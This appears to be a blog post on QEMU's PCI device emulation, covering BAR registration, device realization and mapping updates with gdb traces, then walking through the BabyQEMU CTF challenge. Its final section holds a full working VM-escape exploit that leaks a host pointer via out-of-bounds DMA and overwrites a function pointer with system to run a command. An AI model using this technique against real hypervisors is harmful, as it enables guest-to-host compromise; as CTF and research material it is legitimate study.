QEMU Internal: PCI Device

Introduction

In this post, I give an introduction to PCI device emulation in QEMU. I start with the function pci_register_bar, then describe how a PCI device is registered on the bus and how its BAR mappings are updated. With that background, I walk through two examples: DMA (Direct Memory Access) in the RTL8139, and MMIO in a CTF device.
I also strongly recommend reading references [1] and [2], which give further useful information about PCI devices in QEMU.

Function pci_register_bar

Let’s start with the realize function of the RTL8139.

memory_region_init_io(&s->bar_io, OBJECT(s), &rtl8139_io_ops, s,
                      "rtl8139", 0x100);
memory_region_init_io(&s->bar_mem, OBJECT(s), &rtl8139_mmio_ops, s,
                      "rtl8139", 0x100);
pci_register_bar(dev, 0, PCI_BASE_ADDRESS_SPACE_IO, &s->bar_io);
pci_register_bar(dev, 1, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->bar_mem);

After attaching the MemoryRegionOps to the newly initialized MemoryRegions, QEMU immediately registers those MemoryRegions as BARs of the PCI device.

Let us dig into this function and see what is going on there.

void pci_register_bar(PCIDevice *pci_dev, int region_num,
                      uint8_t type, MemoryRegion *memory)
{
    PCIIORegion *r;
    uint32_t addr;
    uint64_t wmask;
    pcibus_t size = memory_region_size(memory);

    assert(region_num >= 0);
    assert(region_num < PCI_NUM_REGIONS);
    if (size & (size-1)) {
        fprintf(stderr, "ERROR: PCI region size must be pow2 "
                    "type=0x%x, size=0x%"FMT_PCIBUS"\n", type, size);
        exit(1);
    }

    r = &pci_dev->io_regions[region_num];
    r->addr = PCI_BAR_UNMAPPED;
    r->size = size;
    r->type = type;
    r->memory = NULL;

    wmask = ~(size - 1);
    addr = pci_bar(pci_dev, region_num);
    if (region_num == PCI_ROM_SLOT) {
        /* ROM enable bit is writable */
        wmask |= PCI_ROM_ADDRESS_ENABLE;
    }
    pci_set_long(pci_dev->config + addr, type);
    if (!(r->type & PCI_BASE_ADDRESS_SPACE_IO) &&
        r->type & PCI_BASE_ADDRESS_MEM_TYPE_64) {
        pci_set_quad(pci_dev->wmask + addr, wmask);
        pci_set_quad(pci_dev->cmask + addr, ~0ULL);
    } else {
        pci_set_long(pci_dev->wmask + addr, wmask & 0xffffffff);
        pci_set_long(pci_dev->cmask + addr, 0xffffffff);
    }
    pci_dev->io_regions[region_num].memory = memory;
    pci_dev->io_regions[region_num].address_space
        = type & PCI_BASE_ADDRESS_SPACE_IO
        ? pci_dev->bus->address_space_io
        : pci_dev->bus->address_space_mem;
}

typedef struct PCIIORegion {
    pcibus_t addr; /* current PCI mapping address. -1 means not mapped */
#define PCI_BAR_UNMAPPED (~(pcibus_t)0)
    pcibus_t size;
    uint8_t type;
    MemoryRegion *memory;
    MemoryRegion *address_space;
} PCIIORegion;

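The main goal of this function is to register a newly initialized MemoryRegion as a BAR of the PCI device, so that it can later be mapped into the PCI bus address space. The function works in two steps.
In the first step, it retrieves the corresponding PCIIORegion and fills in the basic information (r->addr = PCI_BAR_UNMAPPED, the size, and the type). It also writes the type bits into the BAR in config space and sets wmask to ~(size - 1), so the guest can only change the address bits above the region size.
In the second step, it sets memory to the MemoryRegion and address_space to the bus's I/O or memory address space, depending on the type.
Note that nothing is mapped at this point: r->addr stays PCI_BAR_UNMAPPED until the BAR is programmed. The two steps tie into two important functions in pci.c: pci_qdev_realize (PCI device registration) and pci_update_mappings (PCI device update).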
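To make the role of wmask more concrete, here is a minimal sketch of how a 32-bit BAR behaves from the guest's point of view. The helper names (bar_wmask, bar_write, bar_probe_size) are hypothetical and not part of QEMU; the masking rule is the one implied by wmask = ~(size - 1) above, and the sizing procedure (write all ones, read back, decode) is the usual one a guest follows.

```c
#include <assert.h>
#include <stdint.h>

/* Flag bit as in the listing above: 0x01 marks an I/O BAR. */
#define BAR_SPACE_IO 0x01u

/* Writable-bit mask for a 32-bit BAR; size must be a power of two. */
static uint32_t bar_wmask(uint32_t size)
{
    assert(size != 0 && (size & (size - 1)) == 0);
    return ~(size - 1);
}

/* Model of a guest write to the BAR: only bits set in wmask can change. */
static uint32_t bar_write(uint32_t cur, uint32_t val, uint32_t wmask)
{
    return (cur & ~wmask) | (val & wmask);
}

/* What a guest does to size a BAR: write all ones, read back, decode. */
static uint32_t bar_probe_size(uint32_t cur, uint32_t wmask)
{
    uint32_t readback = bar_write(cur, 0xffffffffu, wmask);
    /* The low flag bits are not address bits: 2 for I/O, 4 for memory. */
    uint32_t flags = (readback & BAR_SPACE_IO) ? 0x3u : 0xfu;
    return ~(readback & ~flags) + 1;
}
```

For the 0x100-byte RTL8139 I/O BAR, bar_wmask(0x100) is 0xffffff00, so writing 0xffffffff reads back as 0xffffff01 and decodes to a size of 0x100.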

PCI device registration

To give an overview of this process, I set a breakpoint at pci_qdev_realize and got the following stack trace at the first hit.

Thread 1 "qemu-system-x86" hit Breakpoint 1, pci_qdev_realize (qdev=0x5555566045a0, errp=0x7fffffffd630)
    at /home/dango/Security/qemu/hw/pci/pci.c:1822
1822	{
(gdb) bt
#0  pci_qdev_realize at /qemu/hw/pci/pci.c:1822
#1  device_set_realized at /qemu/hw/core/qdev.c:1046
#2  property_set_bool at /qemu/qom/object.c:1667
#3  object_property_set at /qemu/qom/object.c:946
#4  object_property_set_qobject at /qemu/qom/qom-qobject.c:24
#5  object_property_set_bool at /qemu/qom/object.c:1015
#6  qdev_init_nofail at /qemu/hw/core/qdev.c:366
#7  pci_create_simple_multifunction at /qemu/hw/pci/pci.c:1893
#8  pci_create_simple at /qemu/hw/pci/pci.c:1904
#9  i440fx_init at /qemu/hw/pci-host/piix.c:331
#10 pc_init1 at /qemu/hw/i386/pc_piix.c:203
#11 pc_init_v2_4 at /qemu/hw/i386/pc_piix.c:489
#12 main at /qemu/vl.c:4510

The trace shows that PCI device initialization starts from pc_init1. If you remember my previous post, this function is also responsible for initializing RAM. The PCI-related part looks like this:

if (pci_enabled) {
    pci_memory = g_new(MemoryRegion, 1);
    memory_region_init(pci_memory, NULL, "pci", UINT64_MAX);
    rom_memory = pci_memory;
} else {
    pci_memory = NULL;
    rom_memory = system_memory;
}
//some other code
if (pci_enabled) {
    pci_bus = i440fx_init(&i440fx_state, &piix3_devfn, &isa_bus, gsi,
                          system_memory, system_io, machine->ram_size,
                          below_4g_mem_size,
                          above_4g_mem_size,
                          pci_memory, ram_memory);
} else {
    pci_bus = NULL;
    i440fx_state = NULL;
    isa_bus = isa_bus_new(NULL, get_system_memory(), system_io);
    no_hpet = 1;
}

Next, let us look into pci_qdev_realize to see what happens there.

static void pci_qdev_realize(DeviceState *qdev, Error **errp)
{
    PCIDevice *pci_dev = (PCIDevice *)qdev;
    PCIDeviceClass *pc = PCI_DEVICE_GET_CLASS(pci_dev);
    Error *local_err = NULL;
    PCIBus *bus;
    bool is_default_rom;

    /* initialize cap_present for pci_is_express() and pci_config_size() */
    if (pc->is_express) {
        pci_dev->cap_present |= QEMU_PCI_CAP_EXPRESS;
    }

    bus = PCI_BUS(qdev_get_parent_bus(qdev));
    pci_dev = do_pci_register_device(pci_dev, bus,
                                     object_get_typename(OBJECT(qdev)),
                                     pci_dev->devfn, errp);
    if (pci_dev == NULL)
        return;

    //some other code
}

Here we come across the most important function in PCI initialization, do_pci_register_device, which does almost all of the work of initializing a PCI device.

/* -1 for devfn means auto assign */
static PCIDevice *do_pci_register_device(PCIDevice *pci_dev, PCIBus *bus,
                                         const char *name, int devfn,
                                         Error **errp)
{
    PCIDeviceClass *pc = PCI_DEVICE_GET_CLASS(pci_dev);
    PCIConfigReadFunc *config_read = pc->config_read;
    PCIConfigWriteFunc *config_write = pc->config_write;
    Error *local_err = NULL;
    AddressSpace *dma_as;

    //some sanity check

    pci_dev->bus = bus;
    pci_dev->devfn = devfn;
    dma_as = pci_device_iommu_address_space(pci_dev);

    memory_region_init_alias(&pci_dev->bus_master_enable_region,
                             OBJECT(pci_dev), "bus master",
                             dma_as->root, 0, memory_region_size(dma_as->root));
    memory_region_set_enabled(&pci_dev->bus_master_enable_region, false);
    address_space_init(&pci_dev->bus_master_as, &pci_dev->bus_master_enable_region,
                       name);

    pstrcpy(pci_dev->name, sizeof(pci_dev->name), name);
    pci_dev->irq_state = 0;
    pci_config_alloc(pci_dev);

    pci_config_set_vendor_id(pci_dev->config, pc->vendor_id);
    pci_config_set_device_id(pci_dev->config, pc->device_id);
    pci_config_set_revision(pci_dev->config, pc->revision);
    pci_config_set_class(pci_dev->config, pc->class_id);

    //some check
    pci_init_cmask(pci_dev);
    pci_init_wmask(pci_dev);
    pci_init_w1cmask(pci_dev);
    if (pc->is_bridge) {
        pci_init_mask_bridge(pci_dev);
    }
    pci_init_multifunction(bus, pci_dev, &local_err);
    if (local_err) {
        error_propagate(errp, local_err);
        do_pci_unregister_device(pci_dev);
        return NULL;
    }

    if (!config_read)
        config_read = pci_default_read_config;
    if (!config_write)
        config_write = pci_default_write_config;
    pci_dev->config_read = config_read;
    pci_dev->config_write = config_write;
    bus->devices[devfn] = pci_dev;
    pci_dev->version_id = 2; /* Current pci device vmstate version */
    return pci_dev;
}

struct PCIDevice {
    //other member variable
    AddressSpace bus_master_as;
    MemoryRegion bus_master_enable_region;
    //other member variable
};

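In do_pci_register_device, the MemoryRegion bus_master_enable_region and the AddressSpace bus_master_as are initialized. bus_master_enable_region is an alias of the root of the device's DMA address space and starts out disabled; bus_master_as, built on top of it, is the address space the device uses for DMA.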
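The effect of the disabled alias can be illustrated with a toy model. This is only a sketch under assumptions: struct toy_dev and its functions are hypothetical, and the rule that the window is switched on by the Bus Master bit (bit 2) of the PCI command register reflects my understanding of the default config-write handler rather than anything shown in the listing above.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define CMD_BUS_MASTER 0x4u   /* bit 2 of the PCI command register */

/* Toy device: guest RAM plus a DMA window that can be switched off. */
struct toy_dev {
    uint16_t command;         /* PCI command register */
    bool dma_enabled;         /* stands in for bus_master_enable_region */
    const uint8_t *ram;       /* stands in for the DMA address space root */
    size_t ram_size;
};

/* Guest writes the command register; the DMA window follows the bit. */
static void toy_write_command(struct toy_dev *d, uint16_t val)
{
    d->command = val;
    d->dma_enabled = (val & CMD_BUS_MASTER) != 0;
}

/* Returns 0 on success, -1 if DMA is disabled or the range is invalid. */
static int toy_dma_read(const struct toy_dev *d, uint64_t addr,
                        void *buf, size_t len)
{
    assert(d != NULL && buf != NULL);
    if (!d->dma_enabled || addr > d->ram_size || len > d->ram_size - addr) {
        return -1;
    }
    memcpy(buf, d->ram + addr, len);
    return 0;
}
```

In this model a DMA read fails until the guest driver has set the Bus Master bit, which matches the initial memory_region_set_enabled(..., false) call in do_pci_register_device.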

PCI device update

Besides the PCI devices that are present by default, there are also devices added on the command line, such as the RTL8139. The function pci_update_mappings is what maps the BARs of a device into the PCI bus address space.

static void pci_update_mappings(PCIDevice *d)
{
    PCIIORegion *r;
    int i;
    pcibus_t new_addr;

    for(i = 0; i < PCI_NUM_REGIONS; i++) {
        r = &d->io_regions[i];

        /* this region isn't registered */
        if (!r->size)
            continue;

        new_addr = pci_bar_address(d, i, r->type, r->size);

        /* This bar isn't changed */
        if (new_addr == r->addr)
            continue;

        /* now do the real mapping */
        if (r->addr != PCI_BAR_UNMAPPED) {
            trace_pci_update_mappings_del(d, pci_bus_num(d->bus),
                                          PCI_FUNC(d->devfn),
                                          PCI_SLOT(d->devfn),
                                          i, r->addr, r->size);
            memory_region_del_subregion(r->address_space, r->memory);
        }
        r->addr = new_addr;
        if (r->addr != PCI_BAR_UNMAPPED) {
            trace_pci_update_mappings_add(d, pci_bus_num(d->bus),
                                          PCI_FUNC(d->devfn),
                                          PCI_SLOT(d->devfn),
                                          i, r->addr, r->size);
            memory_region_add_subregion_overlap(r->address_space,
                                                r->addr, r->memory, 1);
        }
    }

    pci_update_vga(d);
}

It walks over the device's PCIIORegions, skipping BARs that were never registered, and uses pci_bar_address to compute the address currently programmed into each BAR. If that address differs from r->addr, the old mapping (if any) is removed, r->addr is updated, and, if the new address is valid, r->memory is added as a subregion of r->address_space at that address.
Now, let me verify the procedure above with the RTL8139, and then go further into MMIO with BabyQEMU from XCTF HITB 2017.

RTL8139

My target is the pci_dma_read call in the function affected by CVE-2015-5165. I use the following gdb script to verify the procedure described above.

set pagination off
set logging redirect on
set logging on

break do_pci_register_device
commands
p/x $rdi
x/s $rdx
cont
end

break pci_update_mappings
commands
p/x $rdi
set $name = ((struct PCIDevice *)($rdi))->name
if( strcmp($name,"rtl8139")==0)
bt
end

cont
end

break pci_dma_read
commands
p/x $rdi
set $name = ((struct PCIDevice *)($rdi))->name
if(strcmp($name,"rtl8139")==0)
bt
end
cont
end

run -kernel /home/dango/Kernel/linux-4.15.7/arch/x86/boot/bzImage   -append "console=ttyS0 root=/dev/sda rw"  -hda /home/dango/Kernel/Image/image03/qemu.img  -enable-kvm -m 2G -nographic -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 -netdev user,id=t1, -device pcnet,netdev=t1,id=nic1

This gives the following results, in chronological order:

Thread 1 "qemu-system-x86" hit Breakpoint 1, do_pci_register_device (pci_dev=0x5555573cd140, bus=0x555556603910, name=0x555556371cc0 "rtl8139", devfn=-1, errp=0x7fffffffd7f0) at /home/dango/Security/qemu/hw/pci/pci.c:843
843	{
$6 = 0x5555573cd140
0x555556371cc0:	"rtl8139"

Thread 1 "qemu-system-x86" hit Breakpoint 2, pci_update_mappings (d=0x5555573cd140) at /home/dango/Security/qemu/hw/pci/pci.c:1135
1135	    for(i = 0; i < PCI_NUM_REGIONS; i++) {
$13 = 0x5555573cd140
#0  pci_update_mappings (d=0x5555573cd140) at /qemu/hw/pci/pci.c:1135
#1  pci_do_device_reset (dev=0x5555573cd140) at /qemu/hw/pci/pci.c:242
#2  pcibus_reset (qbus=0x555556603910) at /qemu/hw/pci/pci.c:270
#3  qbus_reset_one (bus=0x555556603910, opaque=0x0) at /qemu/hw/core/qdev.c:318
#4  qbus_walk_children (bus=0x555556603910, pre_devfn=0x0, pre_busfn=0x0, post_devfn=0x5555557d4494 <qdev_reset_one>, post_busfn=0x5555557d44b7 <qbus_reset_one>, opaque=0x0) at /qemu/hw/core/qdev.c:604
#5  qdev_walk_children (dev=0x555556602040, pre_devfn=0x0, pre_busfn=0x0, post_devfn=0x5555557d4494 <qdev_reset_one>, post_busfn=0x5555557d44b7 <qbus_reset_one>, opaque=0x0) at /qemu/hw/core/qdev.c:629
#6  qbus_walk_children (bus=0x555556416780, pre_devfn=0x0, pre_busfn=0x0, post_devfn=0x5555557d4494 <qdev_reset_one>, post_busfn=0x5555557d44b7 <qbus_reset_one>, opaque=0x0) at /qemu/hw/core/qdev.c:595
#7  qbus_reset_all (bus=0x555556416780) at /qemu/hw/core/qdev.c:330
#8  qbus_reset_all_fn (opaque=0x555556416780) at /qemu/hw/core/qdev.c:336
#9  qemu_devices_reset () at /qemu/vl.c:1722
#10 qemu_system_reset (report=false) at /qemu/vl.c:1735
#11 main (argc=19, argv=0x7fffffffde98, envp=0x7fffffffdf38) at /qemu/vl.c:4617


Thread 4 "qemu-system-x86" hit Breakpoint 3, pci_dma_read (dev=0x5555573cd140, addr=2033036384, buf=0x7fffd5405030, len=4) at /home/dango/Security/qemu/include/hw/pci/pci.h:696
696	    return pci_dma_rw(dev, addr, buf, len, DMA_DIRECTION_TO_DEVICE);
$3777 = 0x5555573cd140
#0  pci_dma_read (dev=0x5555573cd140, addr=2033036384, buf=0x7fffd5405030, len=4) at /qemu/include/hw/pci/pci.h:696
#1  rtl8139_cplus_transmit_one (s=0x5555573cd140) at /qemu/hw/net/rtl8139.c:1985
#2  rtl8139_cplus_transmit (s=0x5555573cd140) at /qemu/hw/net/rtl8139.c:2412
#3  rtl8139_io_writeb (opaque=0x5555573cd140, addr=217 '\331', val=64) at /qemu/hw/net/rtl8139.c:2795
#4  rtl8139_ioport_write (opaque=0x5555573cd140, addr=217, val=64, size=1) at /qemu/hw/net/rtl8139.c:3353
#5  memory_region_write_accessor (mr=0x5555573cfb68, addr=217, value=0x7fffd54052f8, size=1, shift=0, mask=255, attrs=...) at /qemu/memory.c:450
#6  access_with_adjusted_size (addr=217, value=0x7fffd54052f8, size=1, access_size_min=1, access_size_max=4, access=0x55555564d8bc <memory_region_write_accessor>, mr=0x5555573cfb68, attrs=...) at /qemu/memory.c:506
#7  memory_region_dispatch_write (mr=0x5555573cfb68, addr=217, data=64, size=1, attrs=...) at /qemu/memory.c:1158
#8  address_space_rw (as=0x555555e96f20 <address_space_io>, addr=49369, attrs=..., buf=0x7ffff7fe9000 "@", len=1, is_write=true) at /qemu/exec.c:2451
#9  kvm_handle_io (port=49369, attrs=..., data=0x7ffff7fe9000, direction=1, size=1, count=1) at /qemu/kvm-all.c:1680
#10 kvm_cpu_exec (cpu=0x555556416c70) at /qemu/kvm-all.c:1849
#11 qemu_kvm_cpu_thread_fn (arg=0x555556416c70) at /qemu/cpus.c:979
#12 start_thread (arg=0x7fffd5408700) at pthread_create.c:465
#13 clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95

First, do_pci_register_device registers the PCIDevice at 0x5555573cd140. Next comes the stack trace of a pci_update_mappings call, here triggered by a device reset. With the help of the debugging script we can observe that the update does not happen only once; the mappings are updated multiple times. Finally, pci_dma_read is reached through a guest write to I/O port 49369, which is dispatched through address_space_io (used for I/O port communication) to offset 217 of the RTL8139 I/O BAR. The DMA read itself then goes through the device's bus_master_as.
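The relationship between the two addresses in the trace (port 49369 in address_space_rw, offset 217 in memory_region_dispatch_write) is plain subtraction of the BAR base. A minimal sketch, with a hypothetical helper bar_offset and the base 0xc000 inferred from the trace as 49369 - 217:

```c
#include <assert.h>
#include <stdint.h>

/*
 * Return the offset of `port` inside the BAR [base, base + size),
 * or -1 if the port does not fall into the BAR.
 */
static int64_t bar_offset(uint64_t base, uint64_t size, uint64_t port)
{
    assert(size != 0);
    if (port < base || port - base >= size) {
        return -1;
    }
    return (int64_t)(port - base);
}
```

With base 0xc000 and size 0x100, bar_offset(0xc000, 0x100, 49369) yields 217 (0xd9), the register offset that rtl8139_io_writeb receives.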

Memory Mapped IO

Now let us get back to BabyQEMU from XCTF HITB 2017. The decompiled pci_hitb_realize shows something new.

#define  PCI_BASE_ADDRESS_SPACE_IO	0x01
#define  PCI_BASE_ADDRESS_SPACE_MEMORY	0x00

static void pci_hitb_realize(PCIDevice *dev, Error **errp)
{
    HITBState *s = HITB(dev);

    /* A single 1 MiB BAR, registered as memory space rather than I/O space */
    memory_region_init_io(&s->bar_mem, OBJECT(s), &hitb_mmio_ops, s,
                          "hitb-mmio", 0x100000uLL);
    pci_register_bar(dev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->bar_mem);
}

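Because the BAR is registered with PCI_BASE_ADDRESS_SPACE_MEMORY, pci_register_bar sets its address_space to the bus's address_space_mem rather than address_space_io. In other words, s->bar_mem is reached through memory-mapped I/O instead of I/O ports.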

With this knowledge of QEMU internals, the exploit code given by KITCTF seems a little more elaborate than necessary. Here is a simplified version of the final exploit, which removes some redundant code and checks from the original write-up. In the code below, I only map the device's MMIO region and replace the mapped dmabuf with a buffer allocated on the heap. In the end, we get the same result as the KITCTF write-up.

#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

#define DMA_BASE 0x40000

unsigned char* iomem;
unsigned char* dmabuf;
uint64_t dmabuf_phys_addr;

#define PAGE_SHIFT  12
#define PAGE_SIZE   (1 << PAGE_SHIFT)
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN     ((1ull << 55) - 1)

int fd;

void die(const char* msg)
{
	perror(msg);
	exit(-1);
}


uint32_t page_offset(uint32_t addr)
{
    return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr)
{
	uint64_t pme, gfn;
	size_t offset;
	offset = ((uintptr_t)addr >> 9) & ~7;
	lseek(fd, offset, SEEK_SET);
	read(fd, &pme, 8);
	if (!(pme & PFN_PRESENT))
		return -1;
	gfn = pme & PFN_PFN;
	return gfn;
}

uint64_t gva_to_gpa(void *addr)
{
	uint64_t gfn = gva_to_gfn(addr);
	assert(gfn != -1);
	return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

void iowrite(uint64_t addr, uint64_t value)
{
	/* volatile keeps the compiler from dropping or merging MMIO accesses */
	*((volatile uint64_t*)(iomem + addr)) = value;
}

uint64_t ioread(uint64_t addr)
{
	return *((volatile uint64_t*)(iomem + addr));
}

void dma_setcnt(uint32_t cnt)
{
	iowrite(144, cnt);
}

void dma_setdst(uint32_t dst)
{
	iowrite(136, dst);
}

void dma_setsrc(uint32_t src)
{
	iowrite(128, src);
}

void dma_start(uint32_t cmd)
{
	iowrite(152, cmd | 1);
}


/* Copy len bytes from the device buffer at addr into dmabuf. */
void dma_read(uint64_t addr, size_t len)
{
	dma_setsrc(addr);
	dma_setdst(dmabuf_phys_addr);
	dma_setcnt(len);

	dma_start(2);
	sleep(1);
}

void dma_write(uint64_t addr, void* buf, size_t len)
{
	assert(len < 0x1000);
	memcpy(dmabuf, buf, len);

	dma_setsrc(dmabuf_phys_addr);
	dma_setdst(addr);
	dma_setcnt(len);

	dma_start(0);

	sleep(1);
}

void dma_write_qword(uint64_t addr, uint64_t value)
{
	dma_write(addr, &value, 8);
}

uint64_t dma_read_qword(uint64_t addr)
{
	dma_read(addr, 8);
	return *((uint64_t*)dmabuf);
}

void dma_crypted_read(uint64_t addr, size_t len)
{
	dma_setsrc(addr);
	dma_setdst(dmabuf_phys_addr);
	dma_setcnt(len);

	dma_start(4 | 2);

	sleep(1);
}

int main(int argc, char *argv[])
{
	int fdmem = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC);
	if (fdmem == -1)
		die("open");
	iomem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fdmem, 0);

	if (iomem == MAP_FAILED)
		die("mmap");

	fd = open("/proc/self/pagemap", O_RDONLY);
	if (fd < 0) {
		perror("open");
		exit(1);
	}
	printf("iomem @ %p\n", iomem);
	
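	dmabuf = malloc(0x1000);
	if (dmabuf == NULL)
		die("malloc");
	/* Touch the whole buffer so it is backed by physical pages.
	   sizeof(dmabuf) would only be the size of the pointer. */
	memset(dmabuf, '\x00', 0x1000);
	dmabuf_phys_addr = gva_to_gpa(dmabuf);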

	printf("DMA buffer (virt) @ %p\n", dmabuf);
	printf("DMA buffer (phys) @ %p\n", (void*)dmabuf_phys_addr);
	
	uint64_t hitb_enc = dma_read_qword(DMA_BASE + 0x1000);
	uint64_t binary = hitb_enc - 0x283dd0;
	printf("binary @ 0x%lx\n", binary);
	uint64_t system = binary + 0x1fdb18;

	dma_write_qword(DMA_BASE + 0x1000, system);
	char* payload = "cat flag;";

	dma_write(DMA_BASE + 0x100, payload, strlen(payload));

	dma_crypted_read(DMA_BASE + 0x100, 0x1);

	return 0;
}

The last remaining question is why we need to open “/sys/devices/pci0000:00/0000:00:04.0/resource0” for MMIO. The answer lies in the device's PCI address.

Install pciutils in the guest and run “lspci”. We get the following result.

root@ubuntu:~# lspci
00:00.0 Host bridge: Intel Corporation 440FX - 82441FX PMC [Natoma] (rev 02)
00:01.0 ISA bridge: Intel Corporation 82371SB PIIX3 ISA [Natoma/Triton II]
00:01.1 IDE interface: Intel Corporation 82371SB PIIX3 IDE [Natoma/Triton II]
00:01.3 Bridge: Intel Corporation 82371AB/EB/MB PIIX4 ACPI (rev 03)
00:02.0 VGA compatible controller: Device 1234:1111 (rev 02)
00:03.0 Ethernet controller: Intel Corporation 82540EM Gigabit Ethernet Controller (rev 03)
00:04.0 Unclassified device [00ff]: Device 1234:2333 (rev 10)

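From the result above, we can see that the address “00:04.0” belongs to the unclassified device 1234:2333, which is the device targeted by our exploit. Its resource0 file in sysfs corresponds to BAR 0, the MMIO region registered in pci_hitb_realize. Therefore, we have to open “/sys/devices/pci0000:00/0000:00:04.0/resource0” for exploitation.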
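To double-check which BAR a resourceN file refers to, the sibling sysfs file named resource lists one line per region with three hexadecimal fields: start, end, and flags. The following sketch parses such a line; the helper names are hypothetical and the sample values in the usage note are made up for illustration, not taken from the challenge VM.

```c
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>

/* Resource type bits as defined by the Linux kernel. */
#define IORESOURCE_IO  0x00000100ull
#define IORESOURCE_MEM 0x00000200ull

struct pci_res {
    uint64_t start, end, flags;
};

/* Parse one "start end flags" line; returns 0 on success, -1 on error. */
static int parse_resource_line(const char *line, struct pci_res *out)
{
    assert(line != NULL && out != NULL);
    if (sscanf(line, "%" SCNx64 " %" SCNx64 " %" SCNx64,
               &out->start, &out->end, &out->flags) != 3) {
        return -1;
    }
    return 0;
}

/* Region size in bytes; the end address is inclusive. */
static uint64_t res_size(const struct pci_res *r)
{
    return r->end - r->start + 1;
}
```

For a hypothetical first line such as "0x00000000fea00000 0x00000000feafffff 0x0000000000040200", the parsed region is a memory resource of size 0x100000, which is what a BAR registered like the one in pci_hitb_realize would look like.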

Conclusion

In this post, I gave a detailed explanation of PCI devices in QEMU. I then used two examples (one with DMA and one with MMIO) to show more details of QEMU's PCI emulation.
I think this will be my last post on QEMU internals. So far I have tried to answer the questions that are likely to arise during the exploitation of QEMU.

References

[1] http://nairobi-embedded.org/mmap_mmio_dma.html
[2] http://nairobi-embedded.org/linux_pci_device_driver.html
